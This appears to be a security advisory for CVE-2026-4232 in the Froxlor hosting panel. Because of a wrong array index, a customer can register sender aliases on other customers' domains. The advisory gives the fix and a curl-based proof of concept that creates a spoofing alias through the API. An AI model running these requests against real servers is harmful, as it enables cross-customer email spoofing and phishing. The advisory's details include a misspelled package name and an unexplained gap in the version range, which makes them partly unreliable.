Froxlor Email Sender Alias Domain Ownership Bypass (CVE-2026-4232)

# Vulnerability Summary: Froxlor Email Sender Alias Domain Ownership Bypass ## Vulnerability Overview **Title**: Email Sender Alias Domain Ownership Bypass via Wrong Array Index Allows Cross-Customer Email Spoofing **CVE ID**: CVE-2026-4232 **CVSS Score**: 5.0 / 10 (Moderate) **Affected Versions**: `froxlror/froxlror` (Composer) <= 2.3.0 **Fixed Version**: 2.3.6 **Description**: In Froxlor, when a user adds a full email address (not an `@domain` wildcard) as a sender, the code incorrectly uses the wrong array index when splitting the email address to pass the local part instead of the domain to the `validateLocalDomainOwnership` function. This causes the ownership check to always pass for a non-existent “domain,” allowing any authenticated customer to add a sender alias for domains belonging to other customers. Subsequently, Postfix’s `sender_login_maps` authorizes the attacker to send emails from these addresses. ## Impact Scope * **Cross-Customer Email Spoofing**: Enables sending emails impersonating other customers’ domains, bypassing Postfix’s `smtpd_sender_login_maps` restriction. * **Multi-Tenant Isolation Breakdown**: The domain ownership check (`validateLocalDomainOwnership`) is the sole barrier, but it is completely ineffective for full email addresses. * **Phishing and Reputation Damage**: Spoofed emails originate from legitimate mail servers, pass SPF/DKIM checks, and may lead to reputation damage for the target domain. ## Remediation Modify the array index on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php` from `[0]` to `[1]` to ensure the domain part is passed. **Code Change**: ```php // Before (line 100): self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // After: self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? ""); ``` ## POC Code ```bash # Prerequisites: Froxlor instance with mail.enable_allow_sender enabled # Two customers: Customer A (mail.domain-a.com) and Customer B (mail.domain-b.com) # Step 1: As Customer A, add a sender alias claiming Customer B's domain # via API: curl -X POST 'https://froxlor-host/api/v1/' \ -H 'Authorization: Basic customer-a-credentials\' \ -H 'Content-Type: application/json' \ -d '{ "command": "EmailSender.add", "params": { "emailaddr": "myaccount@domain-a.com", "allowed_sender": "ceo@domain-b.com" } }' # Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B # Actual: 200 OK - alias is created because validateLocalDomainOwnership # receives "ceo" (local part) instead of "domain-b.com" (domain) # Step 2: Verify the alias was inserted curl -X POST 'https://froxlor-host/api/v1/' \ -H 'Authorization: Basic customer-a-credentials\' \ -H 'Content-Type: application/json' \ -d '{ "command": "EmailSender.listing", "params": {"emailaddr": "myaccount@domain-a.com"} }' # Step 3: Customer A can now send email as ceo@domain-b.com via SMTP # because Postfix sender_login_maps will match the mail_sender_aliases entry # and authorize Customer A's mail account to use that sender address. ```

Goal Reached Thanks to every supporter — we hit 100%!

Froxlor Email Sender Alias Domain Ownership Bypass (CVE-2026-4232)

More from this source